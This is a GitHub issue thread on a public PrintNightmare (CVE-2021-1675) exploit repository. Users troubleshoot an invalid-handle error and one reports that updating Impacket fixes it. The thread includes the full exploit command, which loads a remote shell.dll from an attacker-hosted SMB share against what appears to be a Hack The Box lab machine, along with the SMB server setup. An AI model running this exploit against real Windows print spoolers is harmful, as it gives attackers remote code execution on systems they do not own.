cube0x0 / CVE-2021-1675

C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527

Problem while executing CVE-2021-1675 #66

Open Amolg18 opened 2 years ago

Amolg18 commented 2 years ago

python3 CVE-2021-1675.py PrintNightmare/pwnmeow:'@Qwerty1'@10.129.96.110 '\10.10.14.4\share\shell.dll'
[] Connecting to ncacn_np:10.129.96.110[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[] Executing \??\UNC\10.10.14.4\share\shell.dll
[*] Try 1...
Traceback (most recent call last):
File "/home/htb-ep-7032/CVE-2021-1675.py", line 188, in
main(dce, pDriverPath, options.share)
File "/home/htb-ep-7032/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 636, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x6 - ERROR_INVALID_HANDLE - The handle is invalid.

EggS3c commented 2 years ago

I am getting the same error as you. I have added -smb2support and I have also checked the virus threat protection on my vm machines, and they're off.

spectruni commented 6 months ago

Ran into the same issue.

After running impacket-smbserver smb /tmp/print-nightmare -smb2support for the smb share, and then the CVE exploit, I got the following error message on the smb share:

processRequest (0xe,('Trying to pack None', "When packing field 'CreationTime | <q' in <class 'impacket.smb.SMBFindFileBothDirectoryInfo'>"))

It appears it was related to this issue, which was fixed in Impacket's PR #1303.

Updating Impacket to a version > 0.10.0 solved this problem.